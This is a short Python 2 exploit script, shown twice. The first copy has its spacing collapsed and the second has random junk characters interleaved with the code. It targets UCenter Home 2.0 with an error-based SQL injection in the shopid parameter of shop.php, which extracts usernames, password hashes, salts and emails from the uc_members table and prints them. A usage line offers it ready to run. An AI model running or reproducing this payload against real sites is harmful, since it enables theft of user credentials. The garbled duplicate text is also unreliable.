#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl/ p) ]$ }9 k/ Z7 B' \' E
8 w+ \: J0 o2 y5 ^* V% D5 d6 E) O2 d) ?% y% G# A) F
#!/usr/bin/env python 9 A H2 c: u# i4 f t& n! r
2 ]$ C! o1 V' u
import sys 7 f; X; K' P4 y* K7 l. F: T, Q
import urllib2 # |, E0 N; ]7 `3 i
import re & {5 g, v* X. G! r ~: i
1 h- ?- K% r: g' zdef info(): + v$ I0 {3 s4 l1 U" S1 F% Q$ g8 E: f
print 'From:http://www.exploit-db.com/exploits/14997/'
0 D/ n. g" z+ q) U4 }9 X print 'http://www.hake.cc/Web_loudong/'
% F: L- e: q' k! T- W print 'changed:qiaoy'
& M+ k8 e1 ?/ k- z print 'exp:'
, b4 h# c% ], l3 V print ' ./UCenter_Home_2.0.py site' 3 i/ g7 r8 L0 {) h. c
5 w( \( U, y8 p" u1 f3 Z/ q, Cdef main(): 5 H* ?1 _3 M, L/ _8 G7 o0 E$ e
if len(sys.argv) != 2:
9 `/ G' p6 ` G' Y info() 2 H8 r9 g7 j1 J6 w) P3 v, V
else:
$ P' `' j& q0 i2 r, |6 @5 C site = sys.argv[1] ' D, T5 m! [% {5 \8 b; q' M6 `$ [+ q
if site[0:7] == 'http://':
) m" o# v: h3 n% ] Y( H sitesite =site # n' C, m9 C- d& j# [
elif site[0:8] == 'https://': ) N4 H+ x# @. r2 H* T
sitesite = site
4 u& B+ d9 u7 k5 E! R$ \ else: 2 k3 C: D# j3 S G; A1 ?! G* p
site = 'http://'+site / q7 p/ w9 W+ K2 t, M( s
try: . l6 E. V0 J% L# p" _
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
" t3 [* [ |! p- X$ `. C9 S( o Value = urllib2.urlopen(url).read() " A9 e# P! w$ y5 p' K
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] + A4 w a: @' |& J* i5 O8 P9 J% g
hacked = Msg.split(':')
! T3 X9 p( h% o7 K* O print 'Name: '+hacked[1]
! `6 j M+ C# a3 C% { print 'Passwd: '+hacked[2] $ ?) M! E$ K+ A" j% q4 G
print 'salt: '+hacked[3]
) ^8 P- o% g5 a# ~ print 'email: '+hacked[4]
- C9 R8 ?2 c$ u$ J5 H except: 5 w6 i0 c8 ]- X
print 'Sorry,I can\'t work............'
4 d4 c1 T6 s6 J% g4 { ( ^9 C5 F5 @) W) y4 t
if __name__ == '__main__': 8 O) _: t7 ~' C" R
main() |